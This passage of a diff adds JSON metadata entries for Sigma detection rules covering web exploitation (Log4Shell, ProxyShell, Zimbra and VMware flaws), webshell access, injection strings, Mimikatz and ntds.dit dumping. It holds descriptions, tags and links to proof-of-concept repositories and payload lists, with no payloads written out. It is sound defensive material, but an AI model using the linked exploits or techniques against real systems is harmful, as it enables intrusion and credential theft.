"level": "high", + "falsepositive": [ + "Vulnerability Scanning" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a successful Grafana path traversal exploitation", + "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", + "value": "Grafana Path Traversal Exploitation CVE-2021-43798", + "meta": { + "refs": [ + "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", + "https://github.com/search?q=CVE-2021-43798", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/12/08", + "filename": "web_cve_2021_43798_grafana.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)", + "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702", + "value": "Log4j RCE CVE-2021-44228 Generic", + "meta": { + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/12/10", + "filename": "web_cve_2021_44228_log4j.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Vulnerability scanning" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)", + "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", + "value": "Log4j RCE CVE-2021-44228 in Fields", + "meta": { + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/12/10", + "filename": "web_cve_2021_44228_log4j_fields.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Vulnerability scanning" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection", + "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", + "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", + "https://www.yang99.top/index.php/archives/82/", + "https://github.com/vnhacker1337/CVE-2022-27925-PoC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.27925" + ], + "creation_date": "2022/08/17", + "filename": "web_cve_2022_27925_exploit.yml", + "author": "@gott_cyber", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n", + "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80", + "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass", + "meta": { + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31656_auth_bypass.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2022/08/12", + "filename": "web_cve_2022_31656_auth_bypass.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Vulnerability scanners" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659", + "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706", + "value": "CVE-2022-31659 VMware Workspace ONE Access RCE", + "meta": { + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31659_vmware_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2022/08/12", + "filename": "web_cve_2022_31659_vmware_rce.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Vulnerability scanners", + "Legitimate access to the URI" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective", + "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", + "value": "Apache Spark Shell Command Injection - Weblogs", + "meta": { + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ], + "creation_date": "2022/07/19", + "filename": "web_cve_2022_33891_spark_shell_command_injection.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Web vulnerability scanners" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804", + "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685", + "value": "Atlassian Bitbucket Command Injection Via Archive API", + "meta": { + "refs": [ + "https://twitter.com/_0xf4n9x_/status/1572052954538192901", + "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", + "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", + "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.36804" + ], + "creation_date": "2022/09/29", + "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Web vulnerability scanners" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity", + "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", + "value": "Exchange Exploitation Used by HAFNIUM", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/03/03", + "filename": "web_exchange_exploitation_hafnium.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)", + "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef", + "value": "Exchange ProxyShell Pattern", + "meta": { + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/08/07", + "filename": "web_exchange_proxyshell.yml", + "author": "Florian Roth, Rich Warren", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers", + "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8", + "value": "Successful Exchange ProxyShell Attack", + "meta": { + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" + ], + "tags": [ + "attack.initial_access" + ], + "creation_date": "2021/08/09", + "filename": "web_exchange_proxyshell_successful.yml", + "author": "Florian Roth, Rich Warren", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", + "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", + "value": "Successful IIS Shortname Fuzzing Scan", + "meta": { + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", + "https://www.exploit-db.com/exploits/19525", + "https://github.com/lijiejie/IIS_shortname_Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/10/06", + "filename": "web_iis_tilt_shortname_scan.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects possible Java payloads in web access logs", + "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", + "value": "Java Payload Strings", + "meta": { + "refs": [ + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", + "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" + ], + "tags": [ + "cve.2022.26134", + "cve.2021.26084" + ], + "creation_date": "2022/06/04", + "filename": "web_java_payload_in_access_logs.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate apps" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempt using the JDNIExploiit Kit", + "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", + "value": "JNDIExploit Pattern", + "meta": { + "refs": [ + "https://github.com/pimps/JNDI-Exploit-Kit", + "https://githubmemory.com/repo/FunctFan/JNDIExploit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/12", + "filename": "web_jndi_exploit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate apps the use these paths" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects possible exploitation activity or bugs in a web application", + "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", + "value": "Multiple Suspicious Resp Codes Caused by Single Client", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_multiple_susp_resp_codes_single_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/02/19", + "filename": "web_multiple_susp_resp_codes_single_source.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Unstable application", + "Application that misuses the response codes" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", + "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", + "value": "Nginx Core Dump", + "meta": { + "refs": [ + "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", + "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ], + "creation_date": "2021/05/31", + "filename": "web_nginx_core_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Serious issues with a configuration or plugin" + ], + "logsource.category": "No established category", + "logsource.product": "No established product" + } + }, + { + "description": "Detects path traversal exploitation attempts", + "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", + "value": "Path Traversal Exploitation Attempts", + "meta": { + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_path_traversal_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/09/25", + "filename": "web_path_traversal_exploitation_attempt.yml", + "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", + "level": "medium", + "falsepositive": [ + "Happens all the time on systems exposed to the Internet", + "Internal vulnerability scanners" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report", + "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db", + "value": "Solarwinds SUPERNOVA Webshell Access", + "meta": { + "refs": [ + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", + "https://www.anquanke.com/post/id/226029", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2020/12/17", + "filename": "web_solarwinds_supernova_webshell.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit", + "uuid": "6f55f047-112b-4101-ad32-43913f52db46", + "value": "SonicWall SSL/VPN Jarrewrite Exploit", + "meta": { + "refs": [ + "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sonicwall_jarrewrite_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access" + ], + "creation_date": "2021/01/25", + "filename": "web_sonicwall_jarrewrite_exploit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", + "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", + "value": "Source Code Enumeration Detection by Keyword", + "meta": { + "refs": [ + "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", + "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2019/06/08", + "filename": "web_source_code_enumeration.yml", + "author": "James Ahearn", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects SQL Injection attempts via GET requests in access logs", + "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", + "value": "SQL Injection Strings", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", + "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", + "https://brightsec.com/blog/sql-injection-payloads/", + "https://github.com/payloadbox/sql-injection-payload-list", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" + ], + "tags": "No established tags", + "creation_date": "2020/02/22", + "filename": "web_sql_injection_in_access_logs.yml", + "author": "Saw Win Naung, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Java scripts and CSS Files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects SSTI attempts sent via GET requests in access logs", + "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", + "value": "Server Side Template Injection Strings", + "meta": { + "refs": [ + "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", + "https://github.com/payloadbox/ssti-payloads", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_ssti_in_access_logs.yml" + ], + "tags": "No established tags", + "creation_date": "2022/06/14", + "filename": "web_ssti_in_access_logs.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", + "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", + "value": "Suspicious User-Agents Related To Recon Tools", + "meta": { + "refs": [ + "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", + "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", + "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2022/07/19", + "filename": "web_susp_useragents.yml", + "author": "Nasreddine Bencherchali, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication", + "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", + "value": "Suspicious Windows Strings In URI", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_windows_path_uri.yml" + ], + "tags": [ + "attack.persistence", + "attack.exfiltration", + "attack.t1505.003" + ], + "creation_date": "2022/06/06", + "filename": "web_susp_windows_path_uri.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate application and websites that use windows paths in their URL" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects access to DEWMODE webshell as described in FIREEYE report", + "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5", + "value": "DEWMODE Webshell Access", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_unc2546_dewmode_php_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/02/22", + "filename": "web_unc2546_dewmode_php_webshell.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", + "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", + "value": "Webshell ReGeorg Detection Via Web Logs", + "meta": { + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", + "https://github.com/sensepost/reGeorg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2020/08/04", + "filename": "web_webshell_regeorg.yml", + "author": "Cian Heasley", + "level": "high", + "falsepositive": [ + "Web applications that use the same URL parameters as ReGeorg" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Windows Webshells that use GET requests via access logs", + "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", + "value": "Windows Webshell Strings", + "meta": { + "refs": [ + "https://bad-jubies.github.io/RCE-NOW-WHAT/", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2017/02/19", + "filename": "web_win_webshells_in_access_logs.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", + "User searches in search boxes of the respective website" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects XSS attempts injected via GET requests in access logs", + "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", + "value": "Cross Site Scripting Strings", + "meta": { + "refs": [ + "https://github.com/payloadbox/xss-payload-list", + "https://portswigger.net/web-security/cross-site-scripting/contexts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" + ], + "tags": "No established tags", + "creation_date": "2021/08/15", + "filename": "web_xss_in_access_logs.yml", + "author": "Saw Win Naung, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "JavaScripts,CSS Files and PNG files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", + "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", + "value": "Mimikatz Use", + "meta": { + "refs": [ + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml" + ], + "tags": [ + "attack.s0002", + "attack.lateral_movement", + "attack.credential_access", + "car.2013-07-001", + "car.2019-04-004", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.001", + "attack.t1003.006" + ], + "creation_date": "2017/01/10", + "filename": "win_alert_mimikatz_keywords.yml", + "author": "Florian Roth (rule), David ANDRE (additional keywords)", + "level": "high", + "falsepositive": [ + "Naughty administrators", + "AV Signature updates", + "Files with Mimikatz in their filename" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "value": "Audit CVE Event", + "meta": { + "refs": [ + "https://twitter.com/VM_vivisector/status/1217190929330655232", + "https://twitter.com/DidierStevens/status/1217533958096924676", + "https://twitter.com/FlemmingRiis/status/1217147415482060800", + "https://www.youtube.com/watch?v=ebmW42YYveI", + "https://nullsec.us/windows-event-log-audit-cve/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" + ], + "creation_date": "2020/01/15", + "filename": "win_audit_cve.yml", + "author": "Florian Roth, Zach Mathis", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This detection method points out highly relevant Antivirus events", + "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", + "value": "Relevant Anti-Virus Event", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", + "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", + "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588" + ], + "creation_date": "2017/02/19", + "filename": "win_av_relevant_match.yml", + "author": "Florian Roth, Arnim Rupp", + "level": "high", + "falsepositive": [ + "Some software piracy tools (key generators, cracks) are classified as hack tools" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "An application has been removed. Check if it is critical.", + "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", + "value": "Application Uninstalled", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_builtin_remove_application.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ], + "creation_date": "2022/01/28", + "filename": "win_builtin_remove_application.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "value": "Ntdsutil Abuse", + "meta": { + "refs": [ + "https://twitter.com/mgreen27/status/1558223256704122882", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/14", + "filename": "win_esent_ntdsutil_abuse.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate backup operation/creating shadow copies" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", + "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", + "value": "Dump Ntds.dit To Suspicious Location", + "meta": { + "refs": [ + "https://twitter.com/mgreen27/status/1558223256704122882", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/14", + "filename": "win_esent_ntdsutil_abuse_susp_location.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate backup operation/creating shadow copies" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects MSI package installation from suspicious locations", + "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "value": "MSI Installation From Suspicious Locations", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/31", + "filename": "win_msi_install_from_susp_locations.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Some false positives may occur depending on the environnement" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects installation of a remote msi file from web.", + "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "value": "MSI Installation From Web", + "meta": { + "refs": [ + "https://twitter.com/_st0pp3r_/status/1583922009842802689", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_web.yml" + ], + "tags": [ + 